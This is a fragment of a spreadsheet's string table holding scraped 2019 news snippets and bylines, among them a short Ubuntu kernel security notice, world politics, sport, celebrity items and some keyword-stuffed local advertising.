    <t>Ubuntu Security Notice 4135-1 – Peter Pi discovered a buffer overflow in the virtio network backend implementation in the Linux kernel. An attacker in a guest may be able to use this to cause a denial of service or possibly execute arbitrary code in the host OS. It was discovered that the Linux kernel on PowerPC architectures did not properly handle Facility Unavailable exceptions in some situations. A local attacker could use this to expose sensitive information. Various other issues were also addressed. Published at: September 18, 2019 at 10:22PM View on Packet Storm The post Ubuntu Security Notice USN-4135-1 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Kristalina Georgieva spoke of ‘huge responsibility’ of taking charge amid faltering growthBulgaria’s Kristalina Georgieva has said the global economy needs to be ready to cope with a fresh economic downturn after being chosen to head the International Monetary Fund (IMF).The economist said she was taking charge of the Washington-based organisation at a time when growth was slowing, trade tensions growing and with debt at record levels. Continue reading… Read More</t>
  </si>
  <si>
    <t>Preferred Dentist In Airdrie Alberta Number 1 Dentist In Airdrie Alberta Cosmetic Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Our Promise to You Our Mission Statement: To have a postive impact on the community of Airdrie, our patients and our Bayside Dental &amp; Orthodontics Offers Orthodontics Solutions in Airdrie – Airdrie, AB — (SBWIRE. Additionally, we offer top-notch customer care services, where our excellent staff will guide you. Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. Book your visit! New patients are welcome. Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding. Airdrie Dentists Now Accepting New Patients! Airdries Newest Dental Clinic is Now Open – Get in touch today to book your appointment, walk-ins available. We follow the 2018 Alberta Dentists Fee guide, making dental treatment more affordable. Best Dentists in Airdrie, AB – Airdrie Choice Dental, Bayside Dental &amp; Orthodontics, Blunston Dental Group, North Main Family Dental, Sierra Springs Dental, Sonata Dental, Kingsview Dental, Nose Creek Dental Centre, Grace Family Dental, Rahu. Airdrie Springs Dental – #280 – 2700 Main St. South (Located by Coop), Airdrie, Alberta T4B 2Y1 – Rated 4.9 based on 54 Reviews "I really don't like. Cosmetic Dental Clinic In Airdrie Vicki Vicki has been with Airdrie Springs Dental since September 2015. She provides services as a Registered Dental Hygienist.When not in the dental clinic, Vicki enjoys running, interval training, playing soccer, hanging with her family, Pediatric Dentistry, General Dentistry, Dentures, Highest Rated Dentist Near Airdrie Alberta Preferred Dentist In Airdrie Alberta Number 1 Dentist In Airdrie Alberta Cosmetic Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Our Promise to You Our Mission Statement: To have a postive impact on the community of Airdrie, AB. Dental &amp; Orthodontics offers comprehensive dentistry services and is always looking for the most suitable way to deliver long-lasting and natural-looking results. Speaking about why. Enquire for a fast quote from Airdrie Dental Studio. Excellent ServiceScore : 8.2 from 6 votes. Airdrie in Alberta is the location of this dental clinic where pain free and stress free dentistry is performed by the expert team. All options are.</t>
  </si>
  <si>
    <t>Perfect for creating panic at a Far Northern waterway near you this remote-controlled croc/gator head is the new device everyone is talking about.</t>
  </si>
  <si>
    <t>Tony Wright</t>
  </si>
  <si>
    <t>Montsalvat sits at the edge of Melbourne and of our consciousness. A new director is intent on returning the artists' colony to contemporary focus.</t>
  </si>
  <si>
    <t>A look at the follies, foibles and joys of the human race through the eyes of cartoonist Michael Leunig. Buy prints from Michael Leunig at https://www.thestore.com.au/category/artists/michael-leunig. Join us on Facebook at the Michael Leunig Appreciation Page.</t>
  </si>
  <si>
    <t>WINDOWS 10 recently received a new Microsoft update that appears to be causing a huge problem for some users of the established operating system – here is how to fix the issue in question. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>No Byline</t>
  </si>
  <si>
    <t>Photo credit: Reddit user Branch McDaniel Welcome to the Vancouver Lexicon. Its purpose is to pin down the patois of the City of Vancouver by recording its toponyms, nicknames, slang terms, personalities, places, and other Van-centric things. Full A-Z here. Pil | slang, beverage | Nickname for Old Style Pilsner (5.0% ABV), a fairly basic beer that was first brewed in Lethbridge, Alberta in 1926 and is today distributed by Molson-Coors Canada. It has long been a working class emblem in BC and across the Prairies, where it is fetishized by FUBAR types. To fans of the Saskatchewan Roughriders, it is known as ‘Saskatchewan Champagne’ (Old Style Pilsner is an official sponsor of the football team). The anti-craft beer. Usage | “Ok, so I was on my way to get a case of Pil and a pack of smokes and this fucking deer came out of nowhere, right…”</t>
  </si>
  <si>
    <t>NBA Season Preview: What To Watch For In The Pacific Division – Included: D’Angelo Russell, Kawhi Leonard &amp; Paul George, Kyle Kuzma, Deandre Ayton, and the Kings’ young core. Source: Sports Business News</t>
  </si>
  <si>
    <t>La Liga Review: The Kids On Display La Liga Review: The Kids On Display This post La Liga Review: The Kids On Display appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>NASA scientist Brad Cenko revealed the destructive power of a black hole in the space agency’s newest footage while warning a supermassive black hole sits in the centre of our galaxy. The post NASA shock: Sun-destroying supermassive black hole in centre of OUR galaxy reveals expert appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Just a few weeks before he died, Lemar Safi posted an image that posed a defiant question to the Taliban: "I am a Muslim. Do you really want to kill me?"</t>
  </si>
  <si>
    <t>Prime Minister Boris Johnson faced a backlash from furious U.K. lawmakers on Thursday over his use of confrontational language in Parliament about opponents of his Brexit plan, as the Speaker of the House of Commons warned the country’s political culture has turned “toxic.” CBC | World News</t>
  </si>
  <si>
    <t>Supplied video obtained Tuesday, October 1, 2019 of a Chinese pangolin after it was rescued by Perth-based charity Free The Bears in Laos last week. It was the first time the organisation saved one of the critically endangered species, which is covered in keratin scales that are prized in Asia in the mistaken belief they cure a range of ailments. (AAP Video/Supplied/Free The Bears)(AAP Video/Supplied/XXXX) NO ARCHIVING, EDITORIAL USE ONLY</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190929/p11#a190929p11 A look at how tech firms and government keep failing to curb the sharing of child sexual abuse images, long after the PROTECT our Children Act was passed in ’08 (New York Times) New York Times: A look at how tech firms and government keep failing to curb the sharing of child sexual abuse images, long after the PROTECT our Children Act was passed in ’08 — Online predators create and share the illegal material, which is increasingly cloaked by technology. Source: http://www.techmeme.com/190929/p11#a190929p11 The post A look at how tech firms and government keep failing to curb the sharing of child sexual abuse images, long after the PROTECT our Children Act was passed in ’08 (New York Times) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The Dubbo Cup headlines a cracking nine-race card in the Central West.</t>
  </si>
  <si>
    <t>According to the Shields Gazette’s Liam Kennedy, RB Leipzig’s Yussuf Poulsen and Sevilla’s Rony Lopes are on Newcastle’s radar ahead of the January transfer window. The piece states that the signing of another attacker is the club’s priority this winter, claiming there are concerns growing following our lack of goals and injury issues in attack. As a result, it seems both Danish striker Yussuf Poulsen – who scored 19 goals in Germany last season – and Rony Lopes are being looked at, with the latter a player we’ve been ‘monitoring’ for ‘some time’ according to the Gazette. If everyone is fit we have a few decent options in attack, but Bruce’s lack of attacking plan coupled with injury issues surrounding Allan Saint-Maximin, Andy Carroll and Dwight Gayle have seen us struggle badly for goals. Not only that, £40m man Joelinton is still adapting to English football (and the poor service up to him is hardly helping him!), while Miguel Almiron is a player woefully short on confidence, with him still looking for his first goal in a black and white shirt. Poulsen has bagged one goals and SIX assists in the Bundesliga this season, while Rony Lopes is struggling at Sevilla after completing a £18m move from Monaco just a few months ago. They’re two talented players who could well improve us, but are European prospects with no experience at Premier League level really the answer if we’re scrapping for survival in a few months time? (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>The widow of Jason Mercer, who was killed on the M1 in June, is suing Highways England. Read more? Click here</t>
  </si>
  <si>
    <t>Notre Dame Business Student Wins NBA Hackathon Original Source A University of Notre Dame graduate business student has won first prize in the 2019 NBA Hackathon. Peter Zanca and teammate C.B. Garrett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Notre Dame Business Student Wins NBA Hackathon appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The federal government has indicated it may overturn legislation passed in the ACT that legalises recreational cannabis use.</t>
  </si>
  <si>
    <t>News: Newcastle look at ex-Manchester City youth to strengthen their team Original Source A report in the Northern Echo has indicated that Newcastle United have made Rony Lopes their top target for the winter transfer window. Steve Bruce has identified the attacking areas of his squad as needing to be strengthened, and he believes that Lopes, who currently plays for Sevilla, will be the man to add some attacking flair to his side. The 23-year-old, who played five times for Manchester City, will cost around £18m. The winger has struggled at Sevilla since joining from Monaco this summer only making one appearance and providing no goals as well as no assists. Before this, he was in scintillating form for Monaco scoring 17 goals in the 2017/18 season, but the move to Spain has not worked, and he may be thinking about moving on. Newcastle currently have Christian Atsu, Allan Saint-Maximin, and Matt Ritchie as the only recognised wingers in the squad – so they could do with some more depth out wide. Lopes is still young and clearly has a talent, so a move to St James’ Park may be exactly what he needs to reignite his career.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News: Newcastle look at ex-Manchester City youth to strengthen their team appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>BEIJING — China’s leader, Xi Jinping, warned a gathering of senior Communist Party officials in January that the country faced a raft of urgent economic and political risks, and told them to be on guard especially for “indolence, incompetence and becoming divorced from the public.” Now, after months of political tumult in Hong Kong, the warning seems prescient. Only it is Mr. Xi himself and his government facing criticism that they are mishandling China’s biggest political crisis in years, one that he did not mention in his catalog of looming risks at the start of the year. And although few in Beijing would dare blame Mr. Xi openly for the government’s handling of the turmoil, there is quiet grumbling that his imperious style and authoritarian concentration of power contributed to the government’s misreading of the scope of discontent in Hong Kong, which is only growing. On Friday night, the protests and clashes with the police continued in Hong Kong, even after the region’s embattled chief executive, Carrie Lam, made a major concession days earlier by withdrawing a bill that would have allowed the extradition of criminal suspects to the mainland, legislation which first incited the protests three months ago. The Communist Party’s leadership — and very likely Mr. Xi himself — has been surprised by or oblivious to the depth of the animosity, which has driven hundreds of thousands into the streets of Hong Kong for the past three months. While it was the proposed extradition bill that sparked the protests, they are now sustained by broader grievances against the Chinese government and its efforts to impose greater control over the semiautonomous territory. Beijing has been slow to adapt to events, allowing Ms. Lam to suspend the bill in June, for example, but refusing at the time to let her withdraw it completely. It was a partial concession that reflected the party’s hard-line instincts under Mr. Xi and fueled even larger protests. As public anger in Hong Kong has climbed, the Chinese government’s response grew bombastic and now seems at times erratic. In July, at a meeting that has not been publicly disclosed, Mr. Xi met with other senior officials to discuss the protests. The range of options discussed is unclear, but the leaders agreed that the central government should not intervene forcefully, at least for now, several people familiar with the issue said in interviews in Hong Kong and Beijing. At that meeting, the officials concluded that the Hong Kong authorities and the local police could eventually restore order on their own, the officials said, speaking on condition of anonymity to discuss internal deliberations. There are hints of divisions in the Chinese leadership and stirrings of discontent about Mr. Xi’s policies. Jean-Pierre Cabestan, a political science professor at Hong Kong Baptist University and an expert on Chinese politics, said it appeared that there was debate during the annual informal leaders’ retreat in Beidaihe, a seaside resort not far from Beijing. Some party leaders called for concessions, while others urged action to bring Hong Kong more directly under the mainland’s control, he said. Mr. Cabestan said he believed that “the Chinese leadership is divided on Hong Kong and how to solve the crisis.” Wu Qiang, a political analyst in Beijing, said Mr. Xi’s government had in effect adopted a strategy to procrastinate in the absence of any better ideas for resolving the crisis. “It is not willing to intervene directly or to propose a solution,” he said. “The idea is to wait things out until there is a change.” The upshot is that instead of defusing or containing the crisis, Mr. Xi’s government has helped to widen the political chasm between the central government and many of the seven million residents in a city that is an important hub of international trade and finance, critics say. Another sign of the disarray within the government was the reaction to Ms. Lam’s withdrawal of the bill. On Tuesday, officials in Beijing declared there could be no concessions to the protesters’ demands. A day later, when Ms. Lam pulled the bill back, she claimed to have Beijing’s blessing to do so. The same officials were silent. On Friday, China’s premier, Li Keqiang, said during a news conference with Chancellor Angela Merkel of Germany, who was visiting China, that the government supported Hong Kong in “halting the violence and disorder in accordance with the law.” Mr. Xi, who is 66 and in his seventh year of his now unlimited tenure as the country’s paramount leader, has cast himself as an essential commander for a challenging time. He has been lionized in state media like no other Chinese leader since Mao. This has made political solutions to the Hong Kong situation harder to find, because even senior officials are reluctant to make the case for compromise or concessions for fear of contradicting or angering Mr. Xi, according to numerous officials and analysts in Hong Kong and Beijing. “Beijing has overreached, overestimating its capacity to control events and underestimating the complexity of Hong Kong,” said Brian Fong Chi-hang, an associate professor at the Academy of Hong Kong Studies at the Education University of Hong Kong. The tumult in Hong Kong could pose a risk to Mr. Xi, especially if it exacerbates discontent and discord within the Chinese leadership over other issues. “I think the danger is not that his standing will collapse, but that there is a whole series of slowly unfolding trends that will gradually corrode his position,” said Richard McGregor, a senior fellow at the Lowy Institute in Sydney and author of “Xi Jinping: The Backlash.” “Hong Kong is one, as the protests look set to carry on despite the concessions,” Mr. McGregor said. “The trade war is adding to the pain,” he added, referring to the current standoff with the United States. Mr. Xi returned on Tuesday to the same venue as his speech in January — the Communist Party’s Central Party School — and reprised the warnings he raised in January without suggesting they were in fact worsening. “Faced with the grim conditions and tasks of struggle looming down on us, we must be tough-boned, daring to go on the attack and daring to battle for victory,” he said. While he warned of “a whole range” of internal and external threats — economic, military and environmental — he mentioned Hong Kong only once, and then only in passing. “By painting a dark picture of hostile foreign forces or even unrelenting internal challenges the Communist Party faces in retaining power, it helps justify his continuing strong hand,” said Christopher K. Johnson, a senior fellow at the Center for Strategic and International Studies in Washington. Some analysts see a parallel between Mr. Xi’s handling of Hong Kong and the trade war with the United States, which, like the economy more broadly, seems to be the greatest worry for his government at the moment. In Hong Kong, Mr. Xi’s government unwaveringly supported the extradition bill. And it stuck by that position, refusing to allow Mrs. Lam to withdraw it formally, even as the protesters’ demands grew broader. Her pledge to withdraw it now has been dismissed as too little, too late. In the trade talks, China also balked at accepting President Trump’s initial demands for concessions. When the two sides came close to an agreement in the spring, outlined in an 150-page document, Mr. Xi appeared to balk, scuttling the process. Now Mr. Xi faces an even bigger trade war, with much higher tariffs and greater tensions. The government appears to be hewing to a strategy of waiting out Mr. Trump, possibly through his 2020 re-election campaign, even as the dispute has become a drag on the economy. It remains unclear how Mr. Xi’s government conveyed its approval for Mrs. Lam’s decision — or whether it did. Mrs. Lam’s sudden shift evolved in a matter of days after another weekend of clashes between protesters and the police, several officials said. Mrs. Lam said the decision to withdraw the extradition was hers, but she also asserted that she had Beijing’s full support for doing so, suggesting more coordination than either side has publicly acknowledged. The silence from officials and in state media about Mrs. Lam’s concession suggested that if Mr. Xi’s government did approve of the sudden shift, it wanted to stifle public discussion of it in the mainland. Mrs. Lam herself described the tightrope she must walk during recent remarks to a group of business leaders that was subsequently leaked and published by Reuters. “The political room for the chief executive who, unfortunately, has to serve two masters by constitution, that is, the central people’s government and the people of Hong Kong, that political room for maneuvering is very, very, very limited,” she said. She also offered a candid assessment of Beijing’s views, even if one she did not intend to make public. She said Beijing had no plan to send in the People’s Liberation Army to restore order because “they’re just quite scared now.” “Because they know that the price would be too huge to pay,” she went on. “Maybe they don’t care about Hong Kong, but they care about ‘one country, two systems.’ They care about the country’s international profile. It has taken China a long time to build up to that sort of international profile.” Hong Kong’s unique status, with its own laws and freedoms, has long created a political dilemma for China’s leaders, especially for Mr. Xi, who has made China’s rising economic and political might a central pillar of his public appeals. China’s recovery of sovereignty over the former British colony is a matter of national pride that reversed a century and a half of colonial humiliation. But the mainland maintains what amounts to an international border with Hong Kong. The government’s deepest fear now appears to be that the demands for greater political accountability and even universal suffrage heard on the streets in Hong Kong could spread like a contagion through the mainland. So far, there have been few signs of that. As the crisis has grown, the government has dispatched thousands of troops from the People’s Armed Police to Shenzhen, the mainland city adjacent to Hong Kong, but the exercise was hastily organized and used an outdated plan drawn up after the protests in 2014, according to one official in Hong Kong. Beijing also stepped up its propaganda, launching an information — and disinformation — campaign against the protesters and opposition leaders in Hong Kong. Mr. Xi continues to barely mention Hong Kong. He has said nothing about the protests, even in his passing reference on Tuesday. He has not visited since 2017, when he marked the 20th anniversary of the handover from Britain. After the traditional August holiday break, Mr. Xi’s public calendar of events has since betrayed no hint of political upheaval or threats to his standing. The media’s portrayal of him, already verging on hagiography, became even more fawning. State television and the party’s newspapers now refer to him as “The People’s Leader,” an honorific once bestowed only on Mao. “The People’s Leader loves the people,” The People’s Daily wrote after Mr. Xi toured Gansu, a province in western China. Mr. Xi’s calculation might be simply to remain patient, as he has been in the case of President Trump’s erratic shifts in the trade war. In his remarks on Tuesday, Mr. Xi also gave a possible hint of the government’s pragmatism. “On matters of principle, not an inch will be yielded,” he said, “but on matters of tactics there can be flexibility.” Source link</t>
  </si>
  <si>
    <t>Getting dropped in on isn’t a whole lot of fun, but keeping a cool head when it happens is a good approach if you don’t want to lug around the mental baggage that comes with getting aggro at someone. Take these two blokes. They both set great examples of how to handle an uninvited guest […] The post How To Handle A Drop-In At Uluwatu – 30 August 2019 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Boxing news – Express Sport brings you the latest ongoings in the boxing world. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>A rescue crew saved a pet macaw after it made a break for it and got stuck in a tree in Mesa, Arizona, footage shared on September 5 shows. A video by the Mesa Fire and Medical Department shows the moment a little girl’s pet macaw was plucked from a 40-foot pine tree and brought to safety, thanks to a cherry picker. According to the department, the macaw, called August, doesn’t normally fly because his wings are clipped. He nonetheless managed to make it to the top of the tree before he became stuck. Credit: Mesa Fire and Medical Department via Storyful</t>
  </si>
  <si>
    <t>Lorrin Jane Whitehead was last seen on February 8, 2013. She bought water, a card and black pen and withdrew $150 at an ATM. From there, the mystery begins.</t>
  </si>
  <si>
    <t>Collingwood forward Jordan De Goey has returned to training eight days after departing for a fleeting trip to Germany to receive treatment from a world-renowned hamstring injury specialist.</t>
  </si>
  <si>
    <t>David Crowe</t>
  </si>
  <si>
    <t>“We all know that the current system is not working,” the PM says. But what will he do about it? After six years in government, he owes voters an answer.</t>
  </si>
  <si>
    <t>The UAE fears Houthi rebels in Yemen may have the capacity to strike the global hubs of Dubai and Abu Dhabi.</t>
  </si>
  <si>
    <t>The embattled wealth manager has started telling some of its more than 1,500 aligned advisers that it is cancelling their licences following last year's royal commission.</t>
  </si>
  <si>
    <t>Michael Fowler</t>
  </si>
  <si>
    <t>The chairman of SA mining group Havilah blasted founding shareholders for acting selfishly in derailing the $100m takeover bid at the last minute.</t>
  </si>
  <si>
    <t>Lysander</t>
  </si>
  <si>
    <t>Just before Borderlands 3 is launched, here is another opportunity to get Borderlands - The Handsome Collection at a really fantastic price. The collection includes: Borderlands 2 all Borderlands 2 DLCs (except for Fight for Sanctuary DLC) Borderlands: The Pre-Sequel all Borderlands: The Pre-Sequel DLCs From the website: Shoot and loot as you explore the mayhem-filled world of Pandora in Borderlands 2 and the lunar madness of Borderlands: The Pre-Sequel in Borderlands: The Handsome Collection - now at the BEST EVER price for 48 hours or while stocks last! Experience the award-winning FPS-RPG series, including its bazillions of guns, trademark cooperative gameplay, and all bonus add-on content. YOUR OFFICIAL BORDERLANDS: THE HANDSOME COLLECTION KEY GIVES YOU: • The critically acclaimed BORDERLANDS 2 and BORDERLANDS: THE PRE-SEQUEL games in one package • All bonus add-on content for both games, adding hundreds of hours of gameplay at an incredible value* • Cooperative gameplay for up to four players online *Includes all available downloadable content for Borderlands 2 and Borderlands: The Pre-Sequel as of December 31st, 2017. Note: The Mac and Linux versions of Borderlands 2 are available in English, French, Italian, German and Spanish only. Enjoy!</t>
  </si>
  <si>
    <t>Nissan Motor Co is not currently considering asking embattled CEO Hiroto Saikawa to resign, two people with knowledge of the matter told Reuters on Friday, a day after he admitted to being overpaid in violation of internal procedures.</t>
  </si>
  <si>
    <t>Downtown Los Angeles California Credit Repair | (888) 630-5917 Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. Ex-Google Executive Joins Italian Shoe Firm Tod'sAmid rising scrutiny over government debt and... Sunday 29 September 2019 09:12 PM UTC-05 Ex-Google Executive Joins Italian Shoe Firm Tod's Amid rising scrutiny over government debt and longer payments to … Goldman's entry into savings accounts and credit cards resulted in early loan … http://dlvr.it/RF8qCy</t>
  </si>
  <si>
    <t>Chip Le Grand</t>
  </si>
  <si>
    <t>Although winning premierships is and will remain its core business, Richmond in the afterglow of their grand final mauling of the Giants will reset their ambitions beyond the traditional boundaries of an AFL club.</t>
  </si>
  <si>
    <t>The painting, which is the artist's largest, is expected to fetch well over $2 million with buyers reassured "there is no shredder in this frame".</t>
  </si>
  <si>
    <t>Kirsty Needham</t>
  </si>
  <si>
    <t>The Republic of Kiribati becomes the second Pacific nation to cut diplomatic ties with Taiwan as China says it "highly appreciates" the decision.</t>
  </si>
  <si>
    <t>Tom Duthie</t>
  </si>
  <si>
    <t>Dundee United boss Robbie Neilson is viewing Saturday’s Challenge Cup exit as a reminder to his players they still have plenty work to do to get to where he wants them to be.</t>
  </si>
  <si>
    <t>Steven Batey</t>
  </si>
  <si>
    <t>Championship leader Ott Tänak says next week’s Wales Rally GB is the first event on his quest to “finish the job” as he chases his first Drivers’ Championship crown. Tänak goes into the event next weekend with a 17-point lead over defending champion Sebastien Ogier with three rounds of the 2019 FIA World Rally Championship remaining after the Frenchman won the last event in Turkey. But the Toyota driver has gone strongly in Wales in the past and wants this trend to continue next weekend. He said ahead of the event: “The gap in the championship is closer now, but we have three rallies to go and we know that we were fast on each of them last year. Now we just have to finish the job, starting in Wales.” “Rally GB is always something special. It’s a rally I like, as the roads are fast and they have a nice flow, but the conditions make it difficult, especially because the grip levels are constantly changing at every corner. You need confidence in your car on every rally, but it’s in these kind of conditions where it can really help to make a big difference.” Tänak has in Wales a best result of second, which he claimed back in 2016. Wales Rally GB begins on Thursday with an opening stage at Oulton Park and continues throughout next weekend.</t>
  </si>
  <si>
    <t>Lasttix</t>
  </si>
  <si>
    <t>2 FOR 1 • LIMITED TIME OFFER The Royal Edinburgh Military Tattoo ANZ Stadium, Sydney Select performances 17 - 19 October Platinum NOW $255.00* FOR 2 tickets Gold NOW $189.00* FOR 2 tickets Silver NOW $145.00* FOR 2 tickets Bronze NOW FROM $79.00* FOR 2 tickets *$6.90 Ticketek Service Fee applies. Offer ends 11:59PM, Wed 25 September The biggest ever Royal Edinburgh Military Tattoo marches into Sydney for four shows only! This is your chance to be there when over 1,500 of the world’s finest pipers, drummers and dancers perform against the backdrop of a full-size Edinburgh Castle. For a limited time, when you buy one ticket to select performances this October, you get another one free. But hurry, this offer ends 11:59PM, Wed 25 September.</t>
  </si>
  <si>
    <t>Chris Roots</t>
  </si>
  <si>
    <t>Everest contender Ten Sovereigns ticks the right boxes off the plane, now he wants some Sydney sunshine.</t>
  </si>
  <si>
    <t>Joe Ingles' great week just got better, with the Australian named one of the NBA's top 100 players.</t>
  </si>
  <si>
    <t>Michelle Collins has revealed how she was warned off BBC competition Strictly Come Dancing by her agent. The hit dancing show, which recently launched its 2019 run, regularly pulls in more than 10 million viewers at the weekends. However, the former EastEnders favourite was urged not to sign up, something she seemingly has no regrets about. The Cindy Beale actress said she likes her “privacy” and didn’t want to be labelled a “mature woman”. Speaking to OK! Magazine, Michelle gave her thoughts on taking part in various reality television favourites, saying one almost killed her. When asked directly about Strictly, the small screen favourite stated: “I was going to do it a few years ago but I had a new agent who told me not to do it. “I’m not sure I want to be put in the ‘mature woman’ bracket, and the thought of being in everyone’s living rooms frightens me.” “I like my privacy now,” she continued. “I don’t think I’d stand a chance of winning and I’d only do it to win – I’m pretty competitive. “If I was out the first week, I would die of embarrassment! I’ll be watching my daughter from Corrie, Cath Tyldesley, though.” She went on to discuss ITV’s I’m A Celebrity… Get Me Out Of Here!, which is expected to return later this year. It sees a group of famous faces live in the Australian jungle, often on minimal food and having to undergo grim challenges to secure meals for camp. On if she’d do it, Michelle exclaimed: “God no. I did Bear Grylls: Mission Survive and it’s probably the hardest thing I’ve ever done. “I nearly died every week. It was an amazing challenge but I won’t do anything like that again.” The ex Coronation Street regular is currently busy in HOW LOVE IS SPELT at London’s Southwark Playhouse. She is playing Peta opposite Line Of Duty’s Nigel Boyle, and directed by Charlotte Peters in the show that runs until September 28. Meanwhile, it comes just months after Michelle reportedly said she was frustrated by the soap actress label. She played Cindy on and off between 1988 and 1998, until her alter ego was killed off-screen. The star later portrayed Stella Price in Corrie from 2011 to 2014. According to DigitalSpy, Michelle wrote in a now-deleted tweet: “I wish people would not label me a soap actress it’s very frustrating indeed.” Strictly Come Dancing 2019 returns to BBC One on Saturday at 7pm. Source link</t>
  </si>
  <si>
    <t>GoAdelaide</t>
  </si>
  <si>
    <t>SUPER PROMOTION FOR RAINWATER TANKS IN September! DON'T WASTE THE RAIN! Factory direct sales prices for all rainwater tanks! Free delivery within the area of 300km Adelaide metro! Purchase on-line right now in Australife website: https://australife.com.au/ For all tanks, you can have a $30 discount voucher for shopping directly! Use the discount voucher code directly when you check out: AUD50 15 colors of rainwater tanks to choose from and match your gorgeous house! Customize your own tank configurations to save expensive plumbing fee! We can help you to install the overflow fitting, outlet, bucket tap for free! Australife offers the best price in Adelaide and No.1 service! Enjoy the conveniences of online shopping! Promotion ends 30/09/2019. Please don't hesitate to give a call if you have any questions. Mike 0466 987 999 HOW TO ORDER ① Go to Australife website: https://australife.com.au/ ② Click “Login” to create an account and log in ③ Choose your tank and color ④ Set the tank configurations(optional) ⑤ Add to cart ⑥ Check out( Input contact information, shipping address, discount voucher code AUD50)</t>
  </si>
  <si>
    <t>The anonymous motion seeking to keep the records sealed underscored the fear of people in Epstein's social circles that their standing could be harmed by any links to him.</t>
  </si>
  <si>
    <t>Mark Smith</t>
  </si>
  <si>
    <t>Jamie Redknapp has insisted that Steve Bruce has every reason to feel positive with his start to life as Newcastle United manager. The Sky Sports pundit remarked on the fact that Bruce would know that he was in for criticism after taking over from Rafael Benitez at St James’ Park at the beginning of the season. Redknapp believes that four points from the Magpies’. Source</t>
  </si>
  <si>
    <t>When it comes to losing weight, slimmers can select from a long list of diet plans. Recently, the keto diet has become very popular among many slimmers, with one man recently losing an incredible eight stone on the plan. Labour MP Tom Watson also managed to slim down on the low-carb plan. A predecessor to the famous Atkins diet, the keto diet is a high-fat, low-carb plan, which limits carbohydrates to 20-50 grams per day. It has been credited for helping to achieve a slimmer figure and there’s some evidence to show that it may also be beneficial for Alzheimers diseases, certain cancers and other diseases, too. There is also growing interest in the use of low-carbohydrate diets, including the ketogenic diet, for type 2 diabetes. However, leading nutritionist Lily Soutter says dieters may want to look to other plans for losing weight on a longterm scale. Speaking to the Express.co.uk, Lily revealed that there are some weight loss benefits to the diet plan, however, these are limited. She said: “The most popular and trendy use for the ketogenic diet is weight loss and there are some review studies to suggest that a low carb diet can lead to a small but significant difference in weight loss in comparison to a low fat diet. “However it’s important to remember that some of this weight loss will be down to water loss which accompanies a very low carbohydrate diet.” She added: “The ketogenic diet could be used as a weight loss tool for some, however, it can be difficult to sustain long-term due to its highly restrictive nature.” “Whilst there may be a place for this diet for those suffering with epilepsy and extreme obesity – it’s certainly not a diet to follow without guidance from a health professional and is completely unnecessary for the everyday person.” Lily revealed that the best way to lose weight is by focusing on a consistent plan, which works for the individual. “There is also evidence to indicate that neither low carb or low-fat diets are superior. What really matters when it comes to weight loss is focusing on a diet which the individual can sustain,” she said. Green tea was recently found to speed up the weight loss process and burn belly fat. Studies have shown that flavonoids and caffeine in green tea can speed up the metabolism, allowing the body to break down and process fat faster. Although it contains a small amount of caffeine, it is loaded with powerful antioxidants called catechins, which are believed to work synergistically with caffeine to enhance fat burning. Many studies show that green tea (either as a beverage or a green tea extract supplement) can help lose weight. One study showed that those who consumed green tea and caffeine lost an average of 2.9 pounds during a 12-week period, while sticking to their regular diet. Source link</t>
  </si>
  <si>
    <t>Nickarama</t>
  </si>
  <si>
    <t>Via ABC: The parents of Otto Warmbier, the 22-year-old American student who died shortly after being brought back from North Korea, will dine at the White House on Saturday with President Donald Trump. Warmbier, who had been imprisoned in North Korea for more than a year, died after returning to the U.S. in a state […]</t>
  </si>
  <si>
    <t>James Blake</t>
  </si>
  <si>
    <t>Khloe Kardashian appears to be clapping back at accusations about the origins of her full lips in a new Instagram post. In a series of pictures and a video, the Revenge Body host’s sultry pout is on full display and she seems to be very pleased with the way it looks. In the video, she sends a couple of air kisses the camera’s way, which is the clearest indication that she wants to send a message to the people who criticized her lips in one of her earlier posts. Click here to continue and read more… The Inquisitr Khloe Kardashian Flaunts Sultry Pout On Instagram Despite ‘Lip-Filler’ Accusations</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</si>
  <si>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Tyler, Texas Consumer Credit Counseling Service | (888) 551-1270 by USA Consumer Credit Counseling, Felipe Escobar on Sunday 08 September 2019 04:22 PM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Tyler, Texas Consumer Credit Counseling Service | (888) 551-1270 Sunday 08 September 2019 03:59 PM UTC-05 | Tags: texas-consumer-credit-counseling-service-888-551-1270 tyler https://youtu.be/u6s6LEu4v3g Tyler, Texas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Tyler, Texas credit counseling services provide resources to help solve your money problems. Counselors discuss your entire financial situation and help you develop a personalized plan. They can assist you with starting a budget. And they can help you find educational programs on money management. Debt Collection A debt collector generally is a person or company that regularly collects debts owed to others, usually when those debts are past-due. This includes collection agencies, lawyers who collect debts as part of their business, and companies that buy delinquent debts and then try to collect them. The Fair Debt Collection Practices Act (FDCPA) prohibits debt collectors from using abusive, unfair, or deceptive practices to collect from you. The Servicemembers Civil Relief Act (SCRA) assists active-duty military with financial burdens. Under this act, you may qualify for a reduced interest rate on mortgages and credit card debts. It can offer protection from eviction. It can also delay civil court including bankruptcy, foreclosure, or divorce proceedings. To find out if you qualify, contact Tyler, Texas Consumer Credit Counseling Service (888) 551-1270. While there is no universal program to help with personal debt, there are a number of local programs to help people in financial hardships. One of the main sources of financial hardship is due to illness and medical bills. Not only do people lose income, but medical debt can be very expensive. Left with no recourse, many people use up their savings and even run up credit card debt to pay medical 